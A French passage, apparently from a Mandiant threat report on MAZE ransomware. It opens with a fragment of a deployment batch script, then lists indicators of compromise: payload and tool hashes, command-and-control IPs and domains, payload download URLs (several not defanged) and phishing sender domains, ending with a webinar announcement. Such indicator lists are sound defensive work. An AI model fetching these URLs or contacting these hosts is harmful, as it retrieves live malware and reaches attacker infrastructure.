goto end
:down
  rem Report machine down
  echo %1 >> offline.txt
:end

Exemple de script de déploiement MAZE

Indicateurs de compromission

Charges actives MAZE

064058cf092063a5b69ed8fd2a1a04fe

0f841c6332c89eaa7cac14c9d5b1d35b

108a298b4ed5b4e77541061f32e55751

11308e450b1f17954f531122a56fae3b

15d7dd126391b0e7963c562a6cf3992c

21a563f958b73d453ad91e251b11855c

27c5ecbb94b84c315d56673a851b6cf9

2f78ff32cbb3c478865a88276248d419

335aba8d135cc2e66549080ec9e8c8b7

3bfcba2dd05e1c75f86c008f4d245f62

46b98ee908d08f15137e509e5e69db1b

5774f35d180c0702741a46d98190ff37

5df79164b6d0661277f11691121b1d53

658e9deec68cf5d33ee0779f54806cc2

65cf08ffaf12e47de8cd37098aac5b33

79d137d91be9819930eeb3876e4fbe79

8045b3d2d4a6084f14618b028710ce85

8205a1106ae91d0b0705992d61e84ab2

83b8d994b989f6cbeea3e1a5d68ca5d8

868d604146e7e5cb5995934b085846e3

87239ce48fc8196a5ab66d8562f48f26

89e1ddb8cc86c710ee068d6c6bf300f4

910aa49813ee4cc7e4fa0074db5e454a

9eb13d56c363df67490bcc2149229e4c

a0c5b4adbcd9eb6de9d32537b16c423b

a3a3495ae2fc83479baeaf1878e1ea84

b02be7a336dcc6635172e0d6ec24c554

b40a9eda37493425782bda4a3d9dad58

b4d6cb4e52bb525ebe43349076a240df

b6786f141148925010122819047d1882

b93616a1ea4f4a131cc0507e6c789f94

bd9838d84fd77205011e8b0c2bd711e0

be537a66d01c67076c8491b05866c894

bf2e43ff8542e73c1b27291e0df06afd

c3ce5e8075f506e396ee601f2757a2bd

d2dda72ff2fbbb89bd871c5fc21ee96a

d3eaab616883fcf51dcbdb4769dd86df

d552be44a11d831e874e05cadafe04b6

deebbea18401e8b5e83c410c6d3a8b4e

dfa4631ec2b8459b1041168b1b1d5105

e57ba11045a4b7bc30bd2d33498ef194

e69a8eb94f65480980deaf1ff5a431a6

ef95c48e750c1a3b1af8f5446fa04f54

f04d404d84be66e64a584d425844b926

f457bb5060543db3146291d8c9ad1001

f5ecda7dd8bb1c514f93c09cea8ae00d

f83cef2bf33a4d43e58b771e81af3ecc

fba4cbb7167176990d5a8d24e9505f71

Adresses IP de connexion MAZE

91.218.114.11

91.218.114.25

91.218.114.26

91.218.114.31

91.218.114.32

91.218.114.37

91.218.114.38

91.218.114.4

91.218.114.77

91.218.114.79

92.63.11.151

92.63.15.6 

92.63.15.8 

92.63.17.245

92.63.194.20

92.63.194.3

92.63.29.137

92.63.32.2 

92.63.32.52

92.63.32.55

92.63.32.57

92.63.37.100

92.63.8.47

Domaines associés à MAZE

aoacugmutagkwctu[.]onion

mazedecrypt[.]top 

mazenews[.]top

newsmaze[.]top

URL de téléchargement de MAZE

http://104.168.174.32/wordupd_3.0.1.tmp

http://104.168.198.208/wordupd.tmp

http://104.168.201.35/dospizdos.tmp

http://104.168.201.47/wordupd.tmp

http://104.168.215.54/wordupd.tmp

http://149.56.245.196/wordupd.tmp

http://192.119.106.235/mswordupd.tmp

http://192.119.106.235/officeupd.tmp

http://192.99.172.143/winupd.tmp

http://54.39.233.188/win163.65.tmp

http://91.208.184.174:8079/windef.exe

http://agenziainformazioni[.]icu/wordupd.tmp

http://www.download-invoice[.]site/Invoice_29557473.exe

Documents malveillants

1a26c9b6ba40e4e3c3dce12de266ae10

53d5bdc6bd7904b44078cf80e239d42b

79271dc08052480a578d583a298951c5

a2d631fcb08a6c840c23a8f46f6892dd

ad30987a53b1b0264d806805ce1a2561

c09af442e8c808c953f4fa461956a30f

ee26e33725b14850b1776a67bd8f2d0a

CnC BEACON

173.209.43.61

193.36.237.173

37.1.213.9

37.252.7.142

5.199.167.188

checksoffice[.]me

drivers.updatecenter[.]icu

plaintsotherest[.]net

thesawmeinrew[.]net

updates.updatecenter[.]icu

Fichiers binaires Cobalt Strike

7507fe19afbda652e9b2768c10ad639f

a93b86b2530cc988f801462ead702d84

4f57e35a89e257952c3809211bef78ea

bad6fc87a98d1663be0df23aedaf1c62

f5ef96251f183f7fc63205d8ebf30cbf

c818cc38f46c604f8576118f12fd0a63

078cf6db38725c37030c79ef73519c0c

c255daaa8abfadc12c9ae8ae2d148b31

1fef99f05bf5ae78a28d521612506057

cebe4799b6aff9cead533536b09fecd1

4ccca6ff9b667a01df55326fcc850219

bad6fc87a98d1663be0df23aedaf1c62

CnC Meterpreter

5.199.167.188

Autres fichiers associés

3A5A9D40D4592C344920DD082029B362 (script associé)

76f8f28bd51efa03ab992fdb050c8382 (artefact d'exécution MAZE)

b5aa49c1bf4179452a85862ade3ef317 (script d'arrêt windows.bat) 

fad3c6914d798e29a3fd8e415f1608f4 (script associé)

Outils & Utilitaires

27304b246c7d5b4e149124d5f93c5b01 (PsExec)

42badc1d2f03a8b1e4875740d3d49336 (7zip)

75b55bb34dac9d02740b9ad6b6820360 (PsExec)

9b02dd2a1a15e94922be3f85129083ac (AdFind)

c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

Domaines des émetteurs d'e-mail

att-customer[.]com

att-information[.]com

att-newsroom[.]com

att-plans[.]com

bezahlen-1und1[.]icu

bzst-info[.]icu

bzst-inform[.]icu

bzstinfo[.]icu

bzstinform[.]icu

canada-post[.]icu

canadapost-delivery[.]icu

canadapost-tracking[.]icu

hilfe-center-1und1[.]icu

hilfe-center-internetag[.]icu

trackweb-canadapost[.]icu

Adresses d'enregistrement des domaines d'émetteurs

[email protected]

[email protected]

Mandiant Threat Intelligence organisera un webinaire exclusif le jeudi 21 mai 2020 à 17h00 (heure de Paris). Nos experts dresseront un état des lieux sur la menace MAZE et répondront à toutes les questions des participants. Inscrivez-vous sans attendre pour réserver votre place.